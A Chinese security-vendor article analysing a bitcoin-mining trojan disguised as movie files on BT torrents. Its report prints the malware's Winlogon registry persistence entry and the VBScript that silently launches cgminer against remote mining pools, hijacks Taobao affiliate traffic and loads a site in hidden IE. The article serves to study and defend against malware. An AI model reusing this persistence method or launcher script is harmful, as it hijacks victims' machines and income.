比特幣木馬機理詳解
6月5日,金山毒霸安全中心宣布截獲國內首個比特幣(一種全球流通的網(wǎng)絡虛擬貨幣)挖礦木馬,該木馬偽裝成熱門青春勵志電影《中國合伙人》視頻傳播,黑客控制中毒電腦制造比特幣牟利。很多人表示無法理解,黑客入侵別人電腦難道只是為了生產(chǎn)看不見摸不著的比特幣嗎?
金山毒霸安全專家表示,有時很難理解病毒作者的行為。不過,我們搜索與比特幣有關的新聞卻發(fā)現(xiàn),這個不為公眾所知的全球性虛擬貨幣身價不菲。在過去的三年 里,比特幣的價格上漲了5000倍。2010年,比特幣剛誕生時,1比特幣僅值5美分,三年里一度沖上266美元,今天比特幣兌美元的匯率是1:122
圖1 比特幣最新匯率
有關比特幣的討論引起各界關注,6月5日,美聯(lián)儲副主席珍妮特・耶 倫(Janet Yellen)在國際貨幣基金組織(IMF)年會上表示,美國政府正在研究PayPal(注:類似于支付寶的線上支付工具)和比特幣等在 線支付機制的潛在風險。全球最著名的盜版組織海盜灣的創(chuàng)始人Falkvinge在2011年將全部身家兌換成比特幣,他在最新發(fā)表的文章中指出比特幣是唯 一可以挑戰(zhàn)美國霸權地位的東西。
有國內金融專家認為比特幣不屬于真正意義上的貨幣,只是一種數(shù)量有限的電子商品。制造比特幣被形象的比喻為挖礦,將比特幣看成是人為創(chuàng)造的一座礦藏,屬于有限資源(根據(jù)比特幣算法,最多只有2100萬個),人人都可以挖,誰挖到算誰的。
圖2 利用高性能顯卡GPU挖礦
比特幣在中國也剛剛為人所知,在淘寶網(wǎng)能搜索到1200件與“比特幣”有關的商品,甚至有的網(wǎng)店開始接收比特幣購物。雅安地震時,壹基金就接收了233個比特幣的捐款(當時價值約22萬人民幣)。
一臺性能普通的計算機生產(chǎn)比特幣大概只能收獲0.12美元,而采用高性能GPU顯卡的電腦挖礦效率會高得多。有人計算,一個單 AMD Radeon 6750 顯卡,每月可賺取3個比特幣。黑客如果使用木馬控制1000臺這樣的計算機,每月就能賺取3000 比特幣,市值約36 萬美元。
“不為常人所知的比特幣,成了真正的金礦,令不少人砰然心動。”金山毒霸安全專家這樣說,“我們截獲的這個比特幣礦工病毒大約感染了1500臺計算機。分析發(fā) 現(xiàn),這款比特幣礦工病毒,只調用顯卡的高性能GPU(顯卡主芯片)生產(chǎn)比特幣,未調用CPU資源生產(chǎn),因而一般用戶并不會覺得系統(tǒng)性能下降。如果這個用戶 是高分辨率3D游戲玩家,就會感到游戲卡頓。”
圖3 金山毒霸在電腦中檢測到比特幣礦工
金山毒霸安全專家建議用戶檢查自己的電腦是否被比特幣礦工木馬入侵,盡管這款病毒沒有其他破壞行為,但長時間挖礦對GPU的消耗可能令顯卡溫度過高。另外, 這個病毒還會劫持淘寶客流量,在中毒電腦上發(fā)生的每一筆淘寶交易都會給病毒作者支付酬金,淘寶店主會成為該病毒的另一個受害者。
附:比特幣礦工病毒分析報告
一、樣本信息:
母體樣本(偽裝為熱門電影)通過bt種子傳播。(中國合伙人,星際迷航:暗黑無界等)騙取用戶點擊運行。用戶中招后,病毒會向windows目錄下釋放 csrss.exe,svchost.exe,lsass.exe 等病毒文件。進行淘寶客劫持、刷網(wǎng)站流量、挖bit幣等行為。
病毒工作流程圖:
流程圖
母體:
病毒母體通過BT種子傳播,偽裝為電影文件,程序的圖標也偽裝為播放器圖標。病毒母體通過末尾overlay填充0進行膨脹,使得病毒母體達800M的體積,迷惑用戶認為這個程序為正常電影。
解壓后的文件
母體行為較為簡單,大致分為3個行為:
1.釋放病毒文件至Windows目錄。
運行后會將csrss.exe,svchost.exe,lsass.exe (這些文件為與系統(tǒng)同名的病毒文件)等病毒文件釋放至Windows目錄下。
2.設置啟動項
將csrss文件加入到啟動項中,此步驟和上一步驟都是用了smart install方法。將釋放的文件和需要修改的注冊表都寫在了配置文件中,當做安裝程序一樣修改注冊表,釋放文件。
3.彈框提示用戶此視頻無法播放
此程序會彈出窗口,提示用戶,此文件無法播放,從而隱蔽自己。
運行后彈出窗口
病毒子體:
母體釋放的主要的病毒子體為csrss.exe,svchost.exe,lsass.exe。病毒文件csrss.exe(偽裝后的名稱)為主要調動程 序,負責調用svchost.exe(病毒,刷淘寶客)和lsass.exe(病毒,用于刷bit幣,挖礦工具)。(后文都用 csrss.exe, svchost.exe, lsass.exe 這三個名字代表這三個病毒文件,切勿與系統(tǒng)文件混淆,特此聲明)。其余文件為挖礦 程序的附加程序。
病毒母體釋放文件
Csrss.exe
被設置為自啟動項,啟動后解密自身資源中的腳本,運行腳本。調用svchost和lsass.exe兩個程序進行刷淘寶客和bit幣,后臺訪問51yingshi刷流量。
自啟動項:
- [HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon]
- "Shell"="explorer.exe,C:\\Windows\\csrss.exe"
生成的腳本內容:
- Dim WS
- Dim IE
- Dim Num
- Dim Lsass(2)
- Set WS=WScript.CreateObject("WScript.Shell")
- Set IE=Createobject("InternetExplorer.Application")
- Randomize
- Num=Int(2*Rnd+1)
- Lsass(1)="--url http://51wakuang.net:9332 --user1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH --pass P@ssw0rd --auto-fan --auto-gpu"
- Lsass(2)="--scrypt --url http://51wakuang.net:9327 --userLQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ--pass P@ssw0rd --auto-fan --auto-gpu"
- IE.Visible=Flase
- IE.Navigate "http://www.51yingshi.net"
- WS.Run "C:\Windows\svchost.exe15653040_3457137_11236246",0,False
- WS.Run "C:\Windows\lsass.exe"&Lsass(Num)&"",0,False
簡單的解釋一下這段代碼的含義:
本段代碼有3個作用,調用lsass.exe進行刷bit幣,調用svchost刷淘寶客,訪問
創(chuàng)建一個wscript.shell對象WS,ws對象運行兩個命令。
(1)
- WS.Run "C:\Windows\svchost.exe15653040_3457137_11236246",0,False
這里調用svchost,進行刷淘寶客。 后面標紅的參數(shù)15653040_3457137_11236246為PID。
- WS.Run "C:\Windows\lsass.exe"&Lsass(Num)&"",0,False
執(zhí)行l(wèi)sass程序進行刷bit幣,后面的登錄賬號有兩個選擇,每次隨即抽取。
- Lsass(1)="--url http://51wakuang.net:9332 --user1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH --pass P@ssw0rd --auto-fan --auto-gpu"
- Lsass(2)="--scrypt --url http://51wakuang.net:9327 --userLQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ--pass P@ssw0rd --auto-fan --auto-gpu"
同樣,病毒創(chuàng)建了一個IE對象,后臺默默訪問www.51yingshi.net。瀏覽器設置為隱藏。
代碼如下:
- IE.Visible=Flase
- IE.Navigate "http://www.51yingshi.net"
Lsass.exe
此文件原名為cgminer, 是一個公開的挖礦軟件,與此軟件一起的文件有12個(包含一個文件夾)。其中l(wèi)sass用于gpu挖礦,lsass-nogpu用于cpu挖礦。病毒作者這里只調用了lsass,利用Gpu挖礦,沒有利用cpu進行挖礦。原因可能是cpu完礦的效率很低。本文最后附屬cpu 、gpu挖礦效率對比。
挖礦文件列表如下:
用法為:
cgminer -o 礦池地址 -u 用戶名 -p 密碼
可以推斷出的信息有病毒作者挖礦的礦池,用戶名和密碼。
1.礦池:http://51wakuang.net:9332
用戶名:1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH
密碼:P@ssw0rd--auto-fan --auto-gpu
2.礦池:http://51wakuang.net:9327
用戶名:LQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ
密碼:P@ssw0rd--auto-fan --auto-gpu
此程序運行截圖:
Svchost.exe
用于淘寶客劫持,盜用了智謀淘寶客插件。淘寶客劫持的手法較為普通,這里不做過多介紹。
